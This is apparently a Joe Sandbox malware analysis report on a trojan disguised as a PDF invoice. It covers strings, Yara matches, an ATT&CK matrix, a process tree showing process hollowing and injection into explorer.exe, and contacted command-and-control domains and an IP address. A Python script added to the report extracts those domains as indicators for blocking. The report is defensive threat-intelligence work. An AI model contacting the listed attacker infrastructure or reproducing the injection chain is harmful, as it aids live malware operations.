          Source: Genesis RMS Private Limited November 2024 pdf.exe Binary or memory string: WIN_81
          Source: Genesis RMS Private Limited November 2024 pdf.exe Binary or memory string: WIN_XP
          Source: Genesis RMS Private Limited November 2024 pdf.exe Binary or memory string: WIN_XPe
          Source: Genesis RMS Private Limited November 2024 pdf.exe Binary or memory string: WIN_VISTA
          Source: Genesis RMS Private Limited November 2024 pdf.exe Binary or memory string: WIN_7
          Source: Genesis RMS Private Limited November 2024 pdf.exe Binary or memory string: WIN_8
          Source: Genesis RMS Private Limited November 2024 pdf.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          Source: Yara match, File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007C6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe Code function: 0_2_007C6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket
          MITRE ATT&CK Matrix

          | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
          | Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
          | Credentials | Domains | Default Accounts | 1 Shared Modules | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 21 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
          | Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | 2 Valid Accounts | 3 Obfuscated Files or Information | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
          | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 215 System Information Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction |
          | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 512 Process Injection | 2 Valid Accounts | LSA Secrets | 251 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
          | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Virtualization/Sandbox Evasion | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
          | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Access Token Manipulation | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
          | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 512 Process Injection | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
          | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Rundll32 | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
          Behavior Graph (ID: 1562986, Sample: Genesis RMS Private Limited..., Startdate: 26/11/2024, Architecture: WINDOWS, Score: 100)

          Contacted domains: www.vjoami3.xyz; www.olconsulting.xyz (Performs DNS queries to domains with low reputation); 10 other IPs or domains
          Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures

          Genesis RMS Private Limited November 2024 pdf.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
            -> svchost.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 3 other signatures
              -> explorer.exe (injected): contacts loverhoodie.shop 156.67.73.254, ports 49909, 80, TESONETLT United States
                -> rundll32.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                  -> cmd.exe (started)
                    -> conhost.exe (started)

          | Source | Detection | Scanner | Label |
          | Genesis RMS Private Limited November 2024 pdf.exe | 26% | ReversingLabs | Win32.Trojan.Autoitinject |
          | Genesis RMS Private Limited November 2024 pdf.exe | 100% | Joe Sandbox ML | |
          No Antivirus matches
Name                                                                                                               | Malicious | Antivirus Detection   | Reputation
www.9-club.store/ma28/                                                                                             | true      | Avira URL Cloud: safe | unknown
http://www.loverhoodie.shop/ma28/?ghl=g3TxkNl+yn5Twcj+LCxINTWO7KBD43aaoKhKXIKU+srW3oC+3I0AD9gGWk+MTAYfd+/z&DvcT5=gd64Xt4xCL | true      | Avira URL Cloud: safe | unknown
                                                                                            high
                                                                                            http://www.vjoami3.xyzexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.vjoami3.xyz/ma28/www.ryptocurrency-22237.bondexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.liopew.xyzReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.hgevb.info/ma28/www.9-club.storeexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.iddyspiderish.life/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://schemas.microexplorer.exe, 00000002.00000000.1690797571.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4133618844.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1693239826.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.loverhoodie.shopReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.nfluencer-marketing-83144.bond/ma28/wShexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.iralcity.storeReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://api.msn.com/qexplorer.exe, 00000002.00000000.1691972906.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3107468764.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4134891449.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.liopew.xyz/ma28/www.hgevb.infoexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://www.nfluencer-marketing-83144.bondReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.olconsulting.xyzexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000002.00000000.1688723563.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.hetangosalon.net/ma28/www.loverhoodie.shopexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.vjoami3.xyz/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.hgevb.infoReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.iaokoa.netexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.fricaduka.storeReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.olconsulting.xyzReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.ryptocurrency-22237.bondexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.loverhoodie.shop/ma28/www.vjoami3.xyzexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.ueijodeminasoriginal.shopReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.odgerlazerhats.net/ma28/www.olconsulting.xyzexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.itchen-design-87997.bondexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.iaokoa.netReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://www.fricaduka.storeexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://www.iddyspiderish.lifeReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://www.olconsulting.xyz/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://aka.ms/Vh5j3kexplorer.exe, 00000002.00000002.4132184132.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.liopew.xyz/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
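The FormBook entries in the URL table above all share one path (/ma28/) and arrive fused to whatever sat next to them in explorer.exe memory: an HTTP header fragment ("Referer:"), the next "www." entry of the list, or a few stray letters ("wSh"), because the sandbox string scanner reads the decrypted C2 list straight out of the injected process. The script below is an added example, not code from the Joe Sandbox report or its tooling. It takes those strings (copied from the table and embedded inline so it runs offline), undoes the fusing, recovers the campaign path and the de-duplicated domain list, and keeps a bare hostname only when a string carrying a list artefact vouches for it. The regex, the function names and the confirmed/unconfirmed split are this example's own conventions. Several domains appear with what looks like a missing leading character (ryptocurrency-22237.bond, nfluencer-marketing-83144.bond); the script leaves them exactly as the sandbox reported them.

```python
"""Recover the FormBook C2 domain list from the sandbox URL table.

Added example, not code from the Joe Sandbox report. REPORT_STRINGS is copied
from the table above (embedded so this runs offline); the regex, the names and
the confirmed/unconfirmed split are this example's own conventions.
"""
import re
from collections import Counter

# Copied from the report's URL table: the 30 FormBook-shaped strings plus five
# benign MSN/Windows strings for contrast, byte-for-byte as the sandbox reported them.
REPORT_STRINGS = [
    "http://www.fricaduka.store/ma28/",
    "http://www.itchen-design-87997.bond/ma28/www.hetangosalon.net",
    "http://www.hetangosalon.net", "http://www.vjoami3.xyz",
    "http://www.vjoami3.xyz/ma28/www.ryptocurrency-22237.bond",
    "http://www.liopew.xyzReferer:",
    "http://www.hgevb.info/ma28/www.9-club.store",
    "http://www.iddyspiderish.life/ma28/", "http://www.loverhoodie.shopReferer:",
    "http://www.nfluencer-marketing-83144.bond/ma28/wSh",
    "http://www.iralcity.storeReferer:", "http://www.liopew.xyz/ma28/www.hgevb.info",
    "http://www.nfluencer-marketing-83144.bondReferer:",
    "http://www.olconsulting.xyz",
    "http://www.hetangosalon.net/ma28/www.loverhoodie.shop",
    "http://www.vjoami3.xyz/ma28/", "http://www.hgevb.infoReferer:",
    "http://www.iaokoa.net", "http://www.fricaduka.storeReferer:",
    "http://www.olconsulting.xyzReferer:", "http://www.ryptocurrency-22237.bond",
    "http://www.loverhoodie.shop/ma28/www.vjoami3.xyz",
    "http://www.ueijodeminasoriginal.shopReferer:",
    "http://www.odgerlazerhats.net/ma28/www.olconsulting.xyz",
    "http://www.itchen-design-87997.bond", "http://www.iaokoa.netReferer:",
    "http://www.fricaduka.store", "http://www.iddyspiderish.lifeReferer:",
    "http://www.olconsulting.xyz/ma28/", "http://www.liopew.xyz/ma28/",
    "https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe",
    "https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at",
    "http://schemas.mi",
    "https://powerpoint.office.comcember",
    "https://aka.ms/Vh5j3k",
]

DOMAIN = r"[a-z0-9-]+(?:\.[a-z0-9-]+)+"
# One fused string = www.<domain> [ /<path>/ ] [ www.<next> | Referer: | junk ]
FUSED_RE = re.compile(
    rf"^https?://www\.(?P<dom>{DOMAIN})"   # the list entry itself
    rf"(?:/(?P<path>[a-z0-9]+)/)?"         # campaign path glued on, e.g. ma28
    rf"(?:www\.(?P<next>{DOMAIN})"         # ...then the next list entry,
    rf"|(?P<ref>Referer:)"                 # ...or an HTTP header fragment,
    rf"|[A-Za-z]*)?$",                     # ...or a few stray letters ("wSh")
    re.IGNORECASE,
)


def parse_fused(s):
    """(domain, path, next_domain, marked) or None if s is not FormBook-shaped.
    marked: the string carries a list artefact, not just a bare hostname."""
    m = FUSED_RE.match(s)
    if not m:
        return None
    dom, path, nxt, ref = (m.group(g) for g in ("dom", "path", "next", "ref"))
    return dom.lower(), path, (nxt.lower() if nxt else None), bool(path or nxt or ref)


def extract_formbook_iocs(strings):
    confirmed, unconfirmed, paths, noise = set(), set(), Counter(), []
    for s in strings:
        parsed = parse_fused(s)
        if parsed is None:
            noise.append(s)
            continue
        dom, path, nxt, marked = parsed
        if not marked:
            unconfirmed.add(dom)
            continue
        confirmed.add(dom)
        if nxt:
            confirmed.add(nxt)
        if path:
            paths[path] += 1
    # A bare hostname counts only if a marked string vouches for it; the rest
    # could be unrelated www. hosts that happened to sit in explorer.exe memory.
    unconfirmed -= confirmed
    return {
        "path": paths.most_common(1)[0][0] if paths else None,
        "path_hits": dict(paths),
        "domains": sorted(confirmed),
        "unconfirmed": sorted(unconfirmed),
        "noise": noise,
    }


if __name__ == "__main__":
    iocs = extract_formbook_iocs(REPORT_STRINGS)
    print(f"campaign path /{iocs['path']}/ seen {iocs['path_hits'][iocs['path']]} times")
    print("\n".join(iocs["domains"]))
    print(f"{len(iocs['noise'])} non-FormBook strings ignored")
```

Every one of these URLs is listed with Malicious false and reputation unknown, so the 16 recovered domains, together with the 156.67.73.254 resolution for loverhoodie.shop in the IP table, are what you would block or hunt on. Treat each as a candidate rather than confirmed live C2: FormBook carries decoy domains alongside the real one, which is also why the "Tries to resolve many domain names, but no domain seems valid" signature fired.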
Map legend (share of contacted IPs per country): No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
156.67.73.254 | loverhoodie.shop | United States | | 201341 | TESONETLT | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1562986
Start date and time: 2024-11-26 11:14:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: Genesis RMS Private Limited November 2024 pdf.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@8/2@11/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 48
• Number of non-executed functions: 274
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • VT rate limit hit for: Genesis RMS Private Limited November 2024 pdf.exe
                                                                                                                    TimeTypeDescription
                                                                                                                    05:15:00API Interceptor7886292x Sleep call for process: explorer.exe modified
                                                                                                                    05:15:41API Interceptor7240847x Sleep call for process: rundll32.exe modified
                                                                                                                    No context
                                                                                                                    No context
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    TESONETLThttp://alnassers.netGet hashmaliciousUnknownBrowse
                                                                                                                    • 156.67.75.210
